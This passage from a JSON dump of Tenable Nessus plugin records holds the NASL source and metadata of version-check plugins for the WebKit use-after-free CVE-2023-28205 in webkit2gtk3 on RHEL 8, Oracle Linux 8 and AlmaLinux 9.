package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release) {\n if (exists_check) {\n if (rpm_exists(release:_release, rpm:exists_check) && rpm_check(release:_release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-20T13:40:32", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2023:1919 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Ventura 13.3.1, iOS 16.4.1 and iPadOS 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-20T00:00:00", "type": "nessus", "title": "RHEL 8 : webkit2gtk3 (RHSA-2023:1919)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28205"], "modified": "2023-05-24T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-devel", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc", "p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc-devel"], "id": "REDHAT-RHSA-2023-1919.NASL", "href": "https://www.tenable.com/plugins/nessus/174592", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2023:1919. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174592);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/24\");\n\n script_cve_id(\"CVE-2023-28205\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/01\");\n script_xref(name:\"RHSA\", value:\"2023:1919\");\n\n script_name(english:\"RHEL 8 : webkit2gtk3 (RHSA-2023:1919)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2023:1919 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Ventura\n 13.3.1, iOS 16.4.1 and iPadOS 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1. Processing maliciously\n crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may\n have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2023-28205\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2023:1919\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-28205\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(416);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'Red Hat 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu && 'ppc' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel8/8/aarch64/appstream/debug',\n 'content/dist/rhel8/8/aarch64/appstream/os',\n 'content/dist/rhel8/8/aarch64/appstream/source/SRPMS',\n 'content/dist/rhel8/8/aarch64/baseos/debug',\n 'content/dist/rhel8/8/aarch64/baseos/os',\n 'content/dist/rhel8/8/aarch64/baseos/source/SRPMS',\n 'content/dist/rhel8/8/aarch64/codeready-builder/debug',\n 'content/dist/rhel8/8/aarch64/codeready-builder/os',\n 'content/dist/rhel8/8/aarch64/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/aarch64/highavailability/debug',\n 'content/dist/rhel8/8/aarch64/highavailability/os',\n 'content/dist/rhel8/8/aarch64/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/aarch64/supplementary/debug',\n 'content/dist/rhel8/8/aarch64/supplementary/os',\n 'content/dist/rhel8/8/aarch64/supplementary/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/appstream/debug',\n 'content/dist/rhel8/8/ppc64le/appstream/os',\n 'content/dist/rhel8/8/ppc64le/appstream/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/baseos/debug',\n 'content/dist/rhel8/8/ppc64le/baseos/os',\n 'content/dist/rhel8/8/ppc64le/baseos/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/codeready-builder/debug',\n 'content/dist/rhel8/8/ppc64le/codeready-builder/os',\n 'content/dist/rhel8/8/ppc64le/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/highavailability/debug',\n 'content/dist/rhel8/8/ppc64le/highavailability/os',\n 'content/dist/rhel8/8/ppc64le/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/resilientstorage/debug',\n 'content/dist/rhel8/8/ppc64le/resilientstorage/os',\n 'content/dist/rhel8/8/ppc64le/resilientstorage/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/sap-solutions/debug',\n 'content/dist/rhel8/8/ppc64le/sap-solutions/os',\n 'content/dist/rhel8/8/ppc64le/sap-solutions/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/sap/debug',\n 'content/dist/rhel8/8/ppc64le/sap/os',\n 'content/dist/rhel8/8/ppc64le/sap/source/SRPMS',\n 'content/dist/rhel8/8/ppc64le/supplementary/debug',\n 'content/dist/rhel8/8/ppc64le/supplementary/os',\n 'content/dist/rhel8/8/ppc64le/supplementary/source/SRPMS',\n 'content/dist/rhel8/8/s390x/appstream/debug',\n 'content/dist/rhel8/8/s390x/appstream/os',\n 'content/dist/rhel8/8/s390x/appstream/source/SRPMS',\n 'content/dist/rhel8/8/s390x/baseos/debug',\n 'content/dist/rhel8/8/s390x/baseos/os',\n 'content/dist/rhel8/8/s390x/baseos/source/SRPMS',\n 'content/dist/rhel8/8/s390x/codeready-builder/debug',\n 'content/dist/rhel8/8/s390x/codeready-builder/os',\n 'content/dist/rhel8/8/s390x/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/s390x/highavailability/debug',\n 'content/dist/rhel8/8/s390x/highavailability/os',\n 'content/dist/rhel8/8/s390x/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/s390x/resilientstorage/debug',\n 'content/dist/rhel8/8/s390x/resilientstorage/os',\n 'content/dist/rhel8/8/s390x/resilientstorage/source/SRPMS',\n 'content/dist/rhel8/8/s390x/sap/debug',\n 'content/dist/rhel8/8/s390x/sap/os',\n 'content/dist/rhel8/8/s390x/sap/source/SRPMS',\n 'content/dist/rhel8/8/s390x/supplementary/debug',\n 'content/dist/rhel8/8/s390x/supplementary/os',\n 'content/dist/rhel8/8/s390x/supplementary/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/appstream/debug',\n 'content/dist/rhel8/8/x86_64/appstream/os',\n 'content/dist/rhel8/8/x86_64/appstream/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/baseos/debug',\n 'content/dist/rhel8/8/x86_64/baseos/os',\n 'content/dist/rhel8/8/x86_64/baseos/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/codeready-builder/debug',\n 'content/dist/rhel8/8/x86_64/codeready-builder/os',\n 'content/dist/rhel8/8/x86_64/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/highavailability/debug',\n 'content/dist/rhel8/8/x86_64/highavailability/os',\n 'content/dist/rhel8/8/x86_64/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/nfv/debug',\n 'content/dist/rhel8/8/x86_64/nfv/os',\n 'content/dist/rhel8/8/x86_64/nfv/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/resilientstorage/debug',\n 'content/dist/rhel8/8/x86_64/resilientstorage/os',\n 'content/dist/rhel8/8/x86_64/resilientstorage/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/rt/debug',\n 'content/dist/rhel8/8/x86_64/rt/os',\n 'content/dist/rhel8/8/x86_64/rt/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/sap-solutions/debug',\n 'content/dist/rhel8/8/x86_64/sap-solutions/os',\n 'content/dist/rhel8/8/x86_64/sap-solutions/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/sap/debug',\n 'content/dist/rhel8/8/x86_64/sap/os',\n 'content/dist/rhel8/8/x86_64/sap/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/supplementary/debug',\n 'content/dist/rhel8/8/x86_64/supplementary/os',\n 'content/dist/rhel8/8/x86_64/supplementary/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'webkit2gtk3-2.36.7-1.el8_7.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el8_7.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el8_7.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-20T13:39:55", "description": "The remote Oracle Linux 8 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2023-1919 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-20T00:00:00", "type": "nessus", "title": "Oracle Linux 8 : webkit2gtk3 (ELSA-2023-1919)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28205"], "modified": "2023-09-18T00:00:00", "cpe": ["cpe:/o:oracle:linux:8", "p-cpe:/a:oracle:linux:webkit2gtk3", "p-cpe:/a:oracle:linux:webkit2gtk3-devel", "p-cpe:/a:oracle:linux:webkit2gtk3-jsc", "p-cpe:/a:oracle:linux:webkit2gtk3-jsc-devel"], "id": "ORACLELINUX_ELSA-2023-1919.NASL", "href": "https://www.tenable.com/plugins/nessus/174573", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2023-1919.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174573);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/18\");\n\n script_cve_id(\"CVE-2023-28205\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/01\");\n\n script_name(english:\"Oracle Linux 8 : webkit2gtk3 (ELSA-2023-1919)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2023-1919 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5\n and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing\n maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this\n issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2023-1919.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-28205\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(os_release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:os_release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 8', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\nvar pkgs = [\n {'reference':'webkit2gtk3-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.36.7-1.el8_7.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el8_7.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el8_7.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.36.7-1.el8_7.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.36.7-1.el8_7.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.36.7-1.el8_7.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.36.7-1.el8_7.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release) {\n if (exists_check) {\n if (rpm_exists(release:_release, rpm:exists_check) && rpm_check(release:_release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-20T13:43:08", "description": "The remote AlmaLinux 9 host has packages installed that are affected by a vulnerability as referenced in the ALSA-2023:1918 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-25T00:00:00", "type": "nessus", "title": "AlmaLinux 9 : webkit2gtk3 (ALSA-2023:1918)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:alma:linux:webkit2gtk3", "p-cpe:/a:alma:linux:webkit2gtk3-devel", "p-cpe:/a:alma:linux:webkit2gtk3-jsc", "p-cpe:/a:alma:linux:webkit2gtk3-jsc-devel", "cpe:/o:alma:linux:9", "cpe:/o:alma:linux:9::appstream", "cpe:/o:alma:linux:9::baseos", "cpe:/o:alma:linux:9::crb", "cpe:/o:alma:linux:9::highavailability", "cpe:/o:alma:linux:9::nfv", "cpe:/o:alma:linux:9::realtime", "cpe:/o:alma:linux:9::resilientstorage", "cpe:/o:alma:linux:9::sap", "cpe:/o:alma:linux:9::sap_hana", "cpe:/o:alma:linux:9::supplementary"], "id": "ALMA_LINUX_ALSA-2023-1918.NASL", "href": "https://www.tenable.com/plugins/nessus/174695", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# AlmaLinux Security Advisory ALSA-2023:1918.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174695);\n script_version(\"1.0\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2023-28205\");\n script_xref(name:\"ALSA\", value:\"2023:1918\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/01\");\n\n script_name(english:\"AlmaLinux 9 : webkit2gtk3 (ALSA-2023:1918)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote AlmaLinux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote AlmaLinux 9 host has packages installed that are affected by a vulnerability as referenced in the\nALSA-2023:1918 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5\n and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing\n maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this\n issue may have been actively exploited. (CVE-2023-28205)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://errata.almalinux.org/9/ALSA-2023-1918.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-28205\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(416);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:9\");\n 